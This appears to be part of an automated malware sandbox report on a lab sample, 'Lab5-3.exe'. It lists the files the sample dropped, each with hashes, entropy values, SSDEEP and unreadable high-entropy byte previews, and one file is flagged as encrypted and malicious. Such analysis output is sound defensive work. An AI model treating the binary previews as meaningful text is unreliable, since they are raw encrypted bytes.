                                                                                                          MD5:F8BB5B5567F90A8E5EDDB25E232EE927
                                                                                                          SHA1:F70836AB594B88441CAE974EB665E6A729F49CE0
                                                                                                          SHA-256:AC389CC147A0A79814FC3C42FD69198CCBDC07CE3AC287E057D600D20E6B2950
                                                                                                          SHA-512:5B415E80BC5CD3739087432090EE8F160C0ADE91F30C1CE73A0FC5AFF013F08E48CB3414C98AD6B0F35935735E2F3E5189BEF07275C7EA3777D92641C6DB86B0
                                                                                                          Malicious:false
                                                                                                          Preview:d..8Lt)...l....V@hI]T...pv....c.K.[`!l.EB<hR&.Q....S.(=`x....;.d.Wz.*.9Ay.Cg..T....:+.Q%K......q;.G.1..."...BS.R>O.l.p..].Y.Z.{V..'....d.5..CL.e..."..O6.../ss..A.m....E.L9...~.K...`X.J...........J`..r...2...4.......C.v.=..*m.=.r.+.:..r.0@;c.....s8B;...-.h. c.UQ.Cj1...u....../.?.2!...=zw^.,.H[...I....=n~.j.l4._..pD%o..>n....................1V..........q.0JY).,a...M.=....h.... +`../. ..$...zx....C../...{|}6.f...^..(............8.%...T!A...j..^!..@.....`M.-<..+....................$...8..v...}..........P.).2.@..h.2.G.9..<Hv...!t.^.6E.{..9qae.f...Q.."....]....@.H_^.:..l.a<O.Ic...b:-8.../.&..=..).<....k..V..P*..Kh`.F..|$.+l.X+.W....&2.Z....@X..rYn.._.^K..N_.=tG.......f.i..G_.hc.J.T.%.?NU...Tz......'.Lu.u.R.'....(>.....bIp# p,..Q(...&j.]LB..9.......f..C..dxm...l.9....6.}.OA.......[-%..F..1.........).q6OU.b...ON'K......6p.j..}/&.v".e.....k..\s..c..P.......r...;.G.H<..P..-2JK:.@.....D..~..GW...'.]w.|d.{.%K....6q...y.,.0a...{.+...&M|c.#..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.9245748605927915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fAqug38k6arJ/Jcd68HfUTid3hBaUoSGFcmeykEdEElU92i:fA3g3zxF/yOGx0uKeY2ElUJ
                                                                                                          MD5:8A965A855AFAA3D6BFC35D44BF757E65
                                                                                                          SHA1:128BBBB8BAFA42C7B3438BD929DFB616F836AC5D
                                                                                                          SHA-256:79F9DB3D9B413913BE111CD5782E1349BC0E6712E349482BDF62438B9616C7EE
                                                                                                          SHA-512:34F04503851418912FD9A0D1B61F0E38A8458EFD8FD5653D2892032ADE43AE6F4F464268E6F5E21C1FCFE515054E304E5035D009F3FAF4F06876CD1212FDEA27
                                                                                                          Malicious:false
                                                                                                          Preview:.......Y.....JK.".n0N..Q.........R,.......@.v8NRY.y.....L.+.{.p.. -$.[3.K:.M...lS..R.B6.*...(....X3.8...U^..F.R;g..n_..F9U(..qV.,|.7.....N..~.`..&.$wx $.P_>uJ..}..3^w. V..G..5..L.5.Eyo..Sw.;XM..F...h.yv.)KH.....c3.3....u..<SW..[.<.+s.#l...s..\.9gR...b.R.<..3"..9...8t.9^...~......5f..Q...O.lg...l...%.,.....%...p...U\(.oq..;..8SA/...H..fO3S.G..ih/..x.<d.....f.bs.$$.:m)kIJ>.,.,.J..7<...p...7..}&.v.....Ux(E.T..ZS...x.>K..u. .-.)....?.<.....}......z$...#..w0..S..(.E...X'L.J..7.T>....q.Z.,.T..}+......H.6v...TV..[]..c..{/........rH?..?N..K.".....Z^Q).M.POB...?E%bR.;.(.......l.Z../.[...4....pUf..b...Zt.'.........V..l..'[...i{.6.0Vr;.9...7U.U..J...~.......3..|6..I.....f@.g.N.."..f.8......x....tX...S4tp.I..O.....n......~.^^{.&..a7x.t..^.vUxq.eJ-..N...S.C...3s..O.\..H.......48.A..............^.."<F....K|...;...~.p?....c#..A..P....X9c.Jd...e.W.l..-....O.W<..8.]..h......_.e....$.I...~q.E...qX...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.94300337468639
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ct0lrPS2yxMcUMTFY4CQBA4VZYkRh/2QHfUTid3hBaUoSGFcmeykEdEElU92i:C+rPbyxmwuCVT4Gx0uKeY2ElUJ
                                                                                                          MD5:13BC2573B0E289723C6FC022BF7C3DAE
                                                                                                          SHA1:0B43F7B3596EF497F76C71A1DF42C0B3BBFA8FB9
                                                                                                          SHA-256:F1389A902E417FBAE8232546A7E3DF82B2091E0FCFDAE15F13F32EC1E99CABFA
                                                                                                          SHA-512:6166F95F0BA43CC98B87D0FA5F23C76C89675A145B364B5BF87CC971D9E74DC8801E0AC260F50E6A2ECD480E67B127978E59FF09F3E37D63F791FDBDBDF1D782
                                                                                                          Malicious:false
                                                                                                          Preview:.d...$l.oR...V^Z.z....6.k>lq.H6...lQ!..xS%.E...D.?.j....Y...A;k.w[.....U....r4..[qp..v.y[.m.......t19.....{.I..o7Xe......D..}k...?..U..YR.........?o..Z..2.9.V5.....?..?.........|S.h..............f...-.......6I......a"...S.{....Q..E#.i.S}....Z...VR ?...r...4~V...<.u......a.i.B......%dD..".+.v|0..*d]z..{..T.Q.f..\.(cUUJ1..q..&..U..q ...RkcH..g.....w6.s...HAk..Q..5.|>5..D..Xc...z(....&."...A#....W...o.G....qS.Cyh..\.u.V..`.8...T.U.d..23.....a...:Fl\.&.7...G.Y2n...%C..../Zt..BT..)V...we?...E.;#....eJ.JJ........S.Z....."V....].....f......2V..<#.._O....k-L.#..@.{.+s...*..#.v.o....3.....b..~}".h...$......#..9Z.0.!....Q.3..d.2..3..}..5..0...W..^8..Yy...X%>.)...0..wW...z<?h...L.z.".u..;..I..{..!.....QJa.|!T.rQmhM.:..(..(.e.'....H.......x.k...N+.!..0.fP.&.v...NK..S<.^..W..Z]...O.....)..?......=...D.b..............o..a'v.....m.h. ..~...!. |..Z{=....M.q.. ..E..}.X.&2TMx.vh...p8q.. q.{..^.g`\..?kB...6)............w.I.iw&...n.<......;...P.q.u.4.q=.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.932420432438328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7Hx/5UyIGgK4GGHUt0XeiRH5HfUTid3hBaUoSGFcmeykEdEElU92i:7RiyIGgPI0XrRH6Gx0uKeY2ElUJ
                                                                                                          MD5:311FF25087A3A79C1A80934BFAA5863B
                                                                                                          SHA1:4963F352AFA854821614CA7C9043D80C680D1AD5
                                                                                                          SHA-256:88C9A762FA08D3D637FA1D44BBC3F7BD82368730E7B6C61A0FC2F61BB7BF8792
                                                                                                          SHA-512:24C7B67F0572353EDE5D7C0AED25D15EDCF7D062CAFA7881E06454DA386B8D16B39FA0FE13241AC27E0D9B5F876FDF33C2869205A2FCAB396BC81303EA4A36C2
                                                                                                          Malicious:false
                                                                                                          Preview:;......K(..o"..aN.O..{.a@ .^."..)|..].!..[7.\<.6.V~..*.>.../.... .o.{0...(rR.R...C....|9..Q...2..Ns.....C=7......P..s..7w.d._....s..g.,.k.C....B..^\',......c.c0.A.....E.'...W.....JZ..C...`:QI.5W.....N.`v#^.." .2f.%...=.Iz2....q!.....v.d.z..-..P@1...0..]0A+...x.z...1.g......L..A.3$..G..+.R-.3f...........s..=.......&R...e):#.Y(....h.pk.t..dl....k,}....1-.n..#l...zS\.f........V.ue.k..M#0....}.j2...Q.z.NZ..:...d.......:.......O...%.<.-.R2...>.]...;...j^...g,6..9.......[F._..<.65b...1...T..j}....j.....ks(..p<..qU7..:.+.cu..o.l.b.........Z#.kb.....`..P....e.$..Il.r.>>..'....d.....~.7..o.....U..^z......N&5..|.._..0}.K.....6... ?.@65.2|.L..Er......_...bA...Ux.K. C=.".${..%E.d....` &P=..y....~..._...m.....e.....<!s.l......;.x........'....W.d$cA*..8.,.......U.O.s...^../.U...GVk......-.M.[..1k.TB....t...o^..m.".lw^c.A.&..-.c..s3.k..".fa.)..rn...4p].)..r.1.."...\D..)....H:g.1./....\.P.k..z.VN.....KY.V...C\..9.J..y.....ET....mos......(...A..d..MK..)*..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.933988254176133
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EBRlOGAvS4l7ZeBgzd0W2LpwwzHfUTid3hBaUoSGFcmeykEdEElU92i:gRlpAKE7ldABAGx0uKeY2ElUJ
                                                                                                          MD5:03D071D698BD6013526F0E474DA75536
                                                                                                          SHA1:01C4BF7EE09BC2764CC856EA06399B917067EFB7
                                                                                                          SHA-256:7A08775FDFF41EACD14E1BA67A9ED66E7AB70363F60CCA00F5E88BB1273A2F93
                                                                                                          SHA-512:67777BFBCEEDFB2352E86CF153503114A0B0AA80AA3413AD49C755E4565B27F41BDD6DD077A0FBB47E57912F4AA27613D05DCDB38B4E5D6DCE03D2B8872E2C18
                                                                                                          Malicious:false
                                                                                                          Preview:u?%..,W..}...2..5.../.8......"..z+...@*.8....M....o"...,r^.....,.&>...)...R..h..w..i...fz....w.t....j.@.k......'..Ye?{."J..{...M\r.........cp.....]..f5..J..s[K......J....{.B~<.*...}J.,...W0....R..w^.'.......mB.I._."k.P..5..CF.&;..B.._)..C.[8=.]k2..x'd.....W..:........3..Mb..i:bd\.....bw%zZ.j......Z.,..u1dh..?.x..d.w..{.`S>.....U...~X..=._.)...[<?^#Z$.eE...X....kY..~.x...n_...n...P?........f*.........l.".,.......<}.Q.A...&.S.j...\<.......PBV.xG...5j....#G.].....%..R.P*....jY.{.~.6..qH......Z.c...bd..._..F..A:...8-.S...NBd..{...^:....b..=...Imn.`.ej.1. .9E49q.b\..?..#.x.,.^.....D7.)....@..s.!@.....r2K...U.....n.I,.....Q.P...M.u.....J......D...$mC...]....."...6.0I.;v........2)...<l.~....m,../6.....&.."%.T./LQz.CX.4......2J..S.%..Q...|...aD..C.J..U'...m~.>4_.Y.;...it.p...j...>.d......>.1..Z...>GM....+...........d..k.tW......#....d..#.%....-....=..wy..i...%(0..n.58.y...]....9.{E.....*A...BpqK.X....T../.M.......+N..C..^,.;S.m{.*...*~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.926975995669345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gEGnbyv72WnYI8V0Qn00PHfUTid3hBaUoSGFcmeykEdEElU92i:gNbyv7NYBVdUGx0uKeY2ElUJ
                                                                                                          MD5:97218511A1B6873A063D2AACF031CFC3
                                                                                                          SHA1:D6D80951AFE6D753AD290207B5C9101BB2C99E67
                                                                                                          SHA-256:5D64504E48A5A0DD7DDCBACD701694091A1D64E094ADA34A801AE68BA057ADF9
                                                                                                          SHA-512:325926BF3ACC6DE440E10043BC69AEBE580E09B95C747267D3D92B3FD23D7E1066214412960F96FD623DE76B6A5B1CB972C20A76B83CDF465E97257310844FF6
                                                                                                          Malicious:false
                                                                                                          Preview:[]...hf.AQJ.N...0....{..c_.Te....... .B......r.k..J....2....;Ak.........6....o.Y....`..T.........`jo....../....}.w..A.,.`XS..&.........%.N.Uy......T`..2..#{...kX)...~./...]../..2YP....".d.:..$.V...+gd..b.$..}.0r{....l... ....].bH../.\-.i.2....=...EkD~....buk.:....v.b....G..0.FD(ij:r...H.b...h;...e.x..T.....h....5....y..!hUH,R...`pg..@.9Q.K...m.-.a/.[8J..X.M......T\H...N..{h/.O.^.........ML.g...X.r.R...z............F&.M.....:.k.B$.ZR.vE[..K=...l.b..H}.o....3m..Q.)J@O'.]$..X.,b.e...%.&.#G.........A..d.0......MJ.YS....s.p..#..g...aYf...D,.W..f.yC.nm><M.-..x`..7.........F..~xc.EO....I.....$.Ti!Ct..[..QzQ...j.&.\Ar..Cp...r.l...>.1,.6...s.u.C6<.R...0.N&.keV..J8A....Z......6A"<..S...M..8`..R..'_.....T-......%..si.....s.U.,.....}..g?(.dL^.....D.b_...x...u.G.n..C..c8....P.W.t..b.......Wz)^s;.0..u..Ct.y..1.0..}.\\I.....5.u.q...A...w...h.F..j..^.V...j`"....."<[.7....B..Q.....n....7.#..i.E..k....}d.QSC8#+..`.<..S..v..S'\._....o....Y..o..p.%T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2624
                                                                                                          Entropy (8bit):7.9309233865249915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KwswY9Hopw5E4aE/lnIq7DHvIJlCc72+kHfUTid3hBaUoSGFcmeykEdEElU92i:pLiHo+TnIwrvxcPGx0uKeY2ElUJ
                                                                                                          MD5:E67233A610EAFDFEC715E8A7EEBDE74D
                                                                                                          SHA1:24003E2AEF40E0E7E1B52244869D5B8AA4E4F1BF
                                                                                                          SHA-256:49B5260E080883186050D4F81BB33D782FBCFD483750E9784B163D5093448649
                                                                                                          SHA-512:20F6357F8F780E97BFAB430E7C828D91F28CD872B69104386ADC4E7E016E592DD839B9E1D845A315460B39B18BBE7124CFFD47ED8BE21C2E46B425F0DEAF8A53
                                                                                                          Malicious:false
                                                                                                          Preview:.......b.E.....H...3.r........]l)%,.p........b.G.EW.Je.o....<|.@.....{]...e3p1.zr.rl...Yx....)E....UU..H....CX. ....@L.l.\.l?T`=H.&J...Y.2...$....!o...1.5._..A.*...DN4Lh..o...:6h.n...X9......W).,...3X ..z.......R.....3j.T....8.....R....^.g4u.FU..n5...M.......E...];O.Q........1...-.K..5....h#.z..R...b..]eb.Q..ro2.T..@.&......,o........i.=.+#..~.......@..Gy.5.i..gZn._.U..(a._.*.ML.;.I...Cs9.G0.j.[..e..m$.d.0..,].v.8..Pw.e!0.........1.s..d..g.!h..I2..g..)~...2f.....?.,.)...O.L..%..2.P......-.V..z.7..7...S.U..Z.4.....1..D/g.....4.?..8........=.@!&.....U..C..\..a..y`..L[..............,K..P..\.q......Ps:...y]Mk...B..Y8..*.GDz&.....m....d...8.....6....$.....B.r.8).pd."... Sp9.R..ez..:....P`.)~.+...N....3.b.D....`..Sg.GK...^kL.P...S....].\e.v......4....^.. .e ..|.2d..K....F<yn.I.p.^..w.n=?.S.. .v...r=.J.!..`..c.F.eiy]e.32..l|[..C0.n......F0<Q\....|.).......&;....S.3.r.E.<."[X^Hg']^^\]nX.#e...om[".PM..^.l...P.H..#|p..w...o}/..N....94\.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2640
                                                                                                          Entropy (8bit):7.931663227345448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:D8FRUnnJ+gknTqCepZeToLHrAL5OZtK5zYMHxIJUvY7T1eHfUTid3hBaUoSGFcmk:QvUrknTqppETsirxoBT1xGx0uKeY2Elk
                                                                                                          MD5:3F5622B0CAC82C3F622C906F63EE10B3
                                                                                                          SHA1:AAAA8A5A8853C70E27A87D68BC7BF8D9FADE1CD5
                                                                                                          SHA-256:32D29ACCB749B9602233F46EABFB74FF9E82BB276F1E44315A9A7418104629E7
                                                                                                          SHA-512:70A9F5869CA5E694DA56E3A876D88C6BBD45D9A502381FB876DE47E674C29A773F0896119417C3A2588D629600226CA4D269C78DAA2D33E5D7BEB82C0DD8BBD6
                                                                                                          Malicious:false
                                                                                                          Preview:N....>..Y..eI..........n..3#.Mg....\#'.........w...[*C....&..ta...>...WE..CW..~..S..*Y....E......._..... ....o...I.e...N......29...P..p.S9..tJ.rp.9..@..8.+R^2..M...L.T.5.Q..n...d.V.m=v....\|.3.P..~/8...Jy...2..6...c.G.P..9..eugW.....Z......T..."..x.R.P......2h.]3.e....y.-.....t.G.G{....d..(..D.C..3.>..]..XD..t.....u.1..T..... b..........).4;m..@...XV.....i.Qh..%.K..KE..b.,..)..I.]......h.q. .[.'........,.....a...Yr....E.-~.T..^`K/.?).....{..oz@+..s1.1..@...g.B.T.Cv.|Gv.....|c.d.6a..yU.&I.......<y.....X....qV..j...H.1.......0...NM/....3......2.h..i.OF.......G...'.........^KL.(.7t.&....f'.gL...6.B..V..2}.Q.r7.#.m.g]..r.j.ih^.....5pk......2..".+.e.E.$.6.L.>...<....U.t..1.......xb|.Q.=u%......gnV.......9/.^q5.Z....K....>.......zIP.J..c.../&....zg....&1...%u.=.Ks'`.h4|..\.'G~fd..H......^...#mR......~(...@s..K....3.zb.wJ..!.4..BE.....1.}t~.@.P..&...x.?Z.f.lqUTG...}`V...=.-.\...1...nn0G..$...X$....[>..w......@....eO.`....C.8.r../t)...1y.?]e.9j..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):7.91228123710911
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:R8fSZVgEaXHfUTid3hBaUoSGFcmeykEdEElU92i:pfGx0uKeY2ElUJ
                                                                                                          MD5:50620FD823A4A88BC100F49551C87008
                                                                                                          SHA1:EC028C91D6530221242A4294376F744513D5C455
                                                                                                          SHA-256:B8B28025E0B50EB18B73FC29FA39880E86B9479D1E6D65DC6B8278AF642D00D3
                                                                                                          SHA-512:04F4613D1E2608AA392EEA42E8E707BFAEABCC1742FCEC096C43C2834385EA12663660F96F28A03DB0D794EC294EDF866EDF19BA26FC0D02B1BF683E15820D8C
                                                                                                          Malicious:false
                                                                                                          Preview:..i0...oE..y.....S..K..C<.#.N& 5.V6..iUE.6.wI."..,...I.5..e.........._/.y.P..T.)..0q.!.bR.|K.RL....Jz.p..N...aS.<=`............. ...../A..@.]m.Z.}5Rn"Q.....sl...%..3.Lzb>/z..;WF...Cz....;......E.....3/..&.s-.#..\?x@4...~.6In..i..)%.g[.S..}F>...a;.?]..j.l....\............z\..x..i..W...........`7.._*.0.T....."{9...n.&X..?..C[.G...`H..1IIF....]L!9j.._A....;.o>.v...-.....l..{:..z..-.n.+Hx...%..].;+r &g.ou<*...$....6....e...s....dm....<. ..M.4...[..G.......j.pkL.m0<.......4.(ug.....-...Jvhfn.s1....>Y.P..Kb.......1../m.ZP.9_u 4........s..3.z;R]Q}...I....'-b...._.........]'.c.i.dZ`}s.[...a......$..?..%._1hY....&S.w.....n.i)KQ.",.T..2.\3..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.92830992893537
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zS2tGSdJASnV0NeULNBarYzvxHfUTid3hBaUoSGFcmeykEdEElU92i:LtVdGSV0xNwEzvyGx0uKeY2ElUJ
                                                                                                          MD5:268048249805F9495E212B437EB14A64
                                                                                                          SHA1:EF014E824E3C24ED32B559291F29B92DFA7FF4EA
                                                                                                          SHA-256:507005EA0E740E8ABD40DD94A85A57A8EAFE58B586639E57E83C1DA9589A2277
                                                                                                          SHA-512:EAC2D39330790132249FB3B99AF29A8C97CEC2D41A8318F941A66A033FCB17350300C79F8D0360C77B8E060AEC5502A9F2A2EBE37380DCDF6C38DB588DE31561
                                                                                                          Malicious:false
                                                                                                          Preview:u.._.>=.=.k.g^.a{.b..bh..`..<^./ey..........Z......b.(+.&H..sV....x.UZ)<]:..B#.;j..A.RE............*..|th).$.0zj.....[J.".*...+oZJs*w..=.]uG(..\...m..|..M.:......W.HM...Y.....0.bl...>.., ........EH..7x.LJ./.U....g:.,z...d..6.Q...t.t}..3A.M..(O..%..y!......G/fB.$.Q.(+....@..4.9I.?..8f......!D.+.dX.P.Fq...E.x.u.yWgC.u(..h..\i.l.B.Bw...,.A..w..4_.....EV4S.`.T...i8...]...Iq.....u.uwdgM...[......dK8)...g*.i.{5.50.U_.pwlpE ..0.*.Ri.vv.......t4.&..*.2....g_..o.f.s.{....c.&..&..]...+{Z7.eF.Hf..B.v....D...(...n.~)a...-..(....?@.).<..f.(.E.k,..<.`;...eMY......a7oK...:.V..q)|..eF.~....R..._.&.....D.MP.....mB.(y'. R.y%O.Z0...B...[[&..m.-....P.-.K{..;f.....&..\. .)..j.7....6].?.............=Ae_ .9.9..l.'M)C...V..(-.|3..{...''.1.d..@S..,......-?J..v..n...b..x...rO.....Tu)....A...U.?00.6F.U!.1....#...N[..E.c.NC`;c&V....$...&J8..U..*%.kJ.....Ez..q..l{......Z.{AQ.....I.8..:H^..G..vr8......o.t..It....D..m...x.G..\..W..R..s.c~....a........-.m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.93586314685432
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z8IrA4bG6QyKMv/S+s/OGA8OS0kocrQFBQHfUTid3hBaUoSGFcmeykEdEElU92i:zNM4C5y/C/hhocrgXGx0uKeY2ElUJ
                                                                                                          MD5:11966F89FAD9FCDE2F196DE71218F689
                                                                                                          SHA1:217B0B6CB9A6F93AB897DBA2E1B2E44C71FECDC9
                                                                                                          SHA-256:C93A7B5B4BC2D900C57D3723E3A02291E9B907835369B02249CE0D8FFD65A894
                                                                                                          SHA-512:D4244D9047DFCB9C537498929591F95CC7895493FA5E302D6EE9BCF4E1D2DC3AD81ED0798677CBBA8D4C29D42F1702693C195FE205EE399A2587FFDD0B7E1541
                                                                                                          Malicious:false
                                                                                                          Preview:....w...9..p..R4.zT..b.%&../o..U1..~_...Q.K@n.*..k.y|....0w...5.p4q`zR...~ .S..F}.....GK0#7..j==.......q$!.6.d..K8..e. ....[..>?...tXP.:P..0.p..f.i...D..F<.D.f.`C.....`...V..V'/-.Q...I..Iu....4...{...9L3......'P.....)7#...N....$X.d"%N.,..d......`4..;.@.%..._"...e.....>...g3@S.......Z..BG.~!~.p;...].f....cu.C.J..q...9./.6..s..~2@..FJ~.G.....+x.H.9..+...i...pXB. _.Q..'....z.o3. ...(...p...%...4;Vm..!.g.J.......UD3..K........S..G........+..J.%E.E..R.8.3KI.i:..6...."...?....W.....O2.=$.......)<q.7..T.N...K..x$0..[{.|!.q.T..a.&x....H\.. .s...l_..@Z.I.}}....I.y...!..#...........>X.;....O..t..V...._%.."Z...i~D.;Q.{..?A....4.N.n{..O.....P.yXvy...d..;\.KT...N=......(...0....s.l..a....#.Ngy....\.7.N.g]....;#H.R...@....Zx..H..8..l.Im.^....L.Eb..+....dB]R..g..S.8.?..-.q.....?R...y.C..dSO.....8S\..0.{T..rR.P.7X."a......7....#...tOg.x..g/.d....r`.D.t....d...2..y.[..q.R...Z`...oThc....yQ>...|/..s..h..N..n..Q.Jq.W..N..gC...0.i..V..m.h....@t...q8.lt.V.-...p.8#&k.au..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.942950172886446
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z42mcYl0eJFsTlqpMqatF4MgX4WJVz15gHfUTid3hBaUoSGFcmeykEdEElU92i:zqcYlPFEM7uF4MgjJVx5nGx0uKeY2Elk
                                                                                                          MD5:367490946D544D77995F1E480F473A0A
                                                                                                          SHA1:E5D6C0FE7D9163E0F6C3A6770B6BE8177AA9F437
                                                                                                          SHA-256:ED9ECD0858C8BA1D6BAE7C732E51F0BD01477EF1F72A46AA380BA0AFE8147AC5
                                                                                                          SHA-512:035E11A6786B794B150423DFDAE1347EBE0DE61404DEA808201098FAA31C9C4B765DF5C176129D93232450602E1311525369FBABB8A61AB90F716C70774EA311
                                                                                                          Malicious:false
                                                                                                          Preview:M..$g.-...n<...k...j[..c....n.wW.../.sbC8..z....4....hY...3...Dtx;..0q.j...@@.p..@.?b.%.^..m.~.R.m|]....P|]...Pmp..4*JX.......m.1....z.R.H....0./..'X..rxBA;.J.."...\0x.![....i....a....I..m....)...)t......M.....5.Wp3l..7....._.g.../Jo.=.....`..h.$..-....2..i..j.u..)....:...9 I.&.l.P..("....TZ.0.....F..V.B..c...].x<.>.e.`=q....pY"Wb.:P.....-...._H...h.o.P.O...,...~.U.x..b.<e+. ....+2,Ws......rb....(...|.....i.g.\....".+..Ta.3.zK<.....M.|#$z..rz...P..%../=..(..n .p0Y;....T\..,V]3h....u..A...]1M.X.?M;..,.m.^../.V.._C...0..J..K.v...`4.w....<.g.,$...'..{$~S..z......e.qv*CE....vl..I_o...*9c..B.ur../1..ft>.@.>Z...>....y.....s.cm.|Ok...+x..[..47=T..>|F.,K]?..{.....,.........*..Oz......#...........@.j.'..[... p.....{..5...iu..&.m...!kr...}a./.8.yz....g......rJb.|.....p.$.^=...L...D.$....U..2*q6..(z......n..#7....o..2..."...}...>.....<..i...~'.n...iQ....^...-MW...1;.vLNW..{g.t...a.|.&....S8aJ....H..q[...d.?...$....u.N.U[.l.~[u.f...-..t.L.O{..u..{....o8.I/.#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56208
                                                                                                          Entropy (8bit):7.9968371875273
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:Yv5WooBsPoigs/kYRHwfrhT9WoRi6iFC0bamZBkFezUlOwZ:poJhx/k5frv0vzYdZ
                                                                                                          MD5:C272E23E13FFE3A9AC962298D8E62005
                                                                                                          SHA1:481196B9427BB29A63B4F1177BA6956821648545
                                                                                                          SHA-256:CF142450F87A711CE62E980A403DFF18FFBD6C48A99EC6FA25046AB8A0A8A22F
                                                                                                          SHA-512:DC040DA02C58E0957EC57FCF47F1582CFD86EF65943D388037BAF74FE1C82B815F7DEC62B2C4E05290AF8228BC981EC253928D85198124CC0957ABF7575DEA20
                                                                                                          Malicious:true
                                                                                                          Preview:q...&...j....Um.is..60.wl.%.q..1n...(..ox*C..bdn.4..}.|>......q.d..Y.|.%x.}.=...9DJ..uE....A0x........[...#$.=.....]{:..c..%....m..W.N..xs6e.~N.B....."...uO.8.w..,..s)..).b^..^...v.!..K.j..V.........MA....@.w7..{7.h5...n5..L.F,;.......XF...L.....B...Jb..k......e....Gp..O.z_`.?7.6.e..:.<......S*..Oqw...B.a... \.r..q-+d.|9....5'S..k......XQ.6$.Q.{.W...3I....b\Kor.T.'..@ci.5.g...x.Q./ONC.&.zgxS.B..V<].h1..j..p.I:.%@./.p.....SvV..`.&v......m.kE.!..e..N......Pe...d.q.<..t".i..@.B~m(.<p..Y..r. S.Y...++..G~.8..a..</....[...P...Z3.dB.u..@lk..........c..t.......K..y..........p.s..L.....gA...L....*.Y0...jZ..o....v70...S.B<.h...MfW....AXoC.....uQ.........o...ZU....l.....7Pw.9t..?...!.e0..g..\..E:../.....4..;....^._."......Q3{Rr.#. ..:....O.Z*K.+...|S.5....|S.....$Q....KX....'B(..*..g..HWTa.Q.#...c.Y2&.n..]..V.im.p.1..l.....,.._....dg...*.hpxe9&O..Mi.4'.*U......).`'...f...vP.!Z7)f.\..@..F.}s...o......]_....a..i=F.$e...N.y.$|..^.T=W..&...".'..d...N.I).c.y....e2......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.917135509168057
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:e9wT+fVB70GY8Y2LowHry4htcsHfUTid3hBaUoSGFcmeykEdEElU92i:qwT+fbHh7DyGx0uKeY2ElUJ
                                                                                                          MD5:85F1CDB8613DADE5D6CAC172ECBC7133
                                                                                                          SHA1:0AF446D1A67613FB92F7D1D6BB20CA7CCC0B9373
                                                                                                          SHA-256:E6B616686178613982C5B264890FD9FAEED28C523A9729D4AE53401A00DAFA9B
                                                                                                          SHA-512:53B05B87A9C88871A1E3E5C1D5134DF91C94FEA52D17F4860FCDFBA903629745347B65698603DFC500BB113FA49D90A13959EE78BB98FAD9F93C4A26E55186C8
                                                                                                          Malicious:false
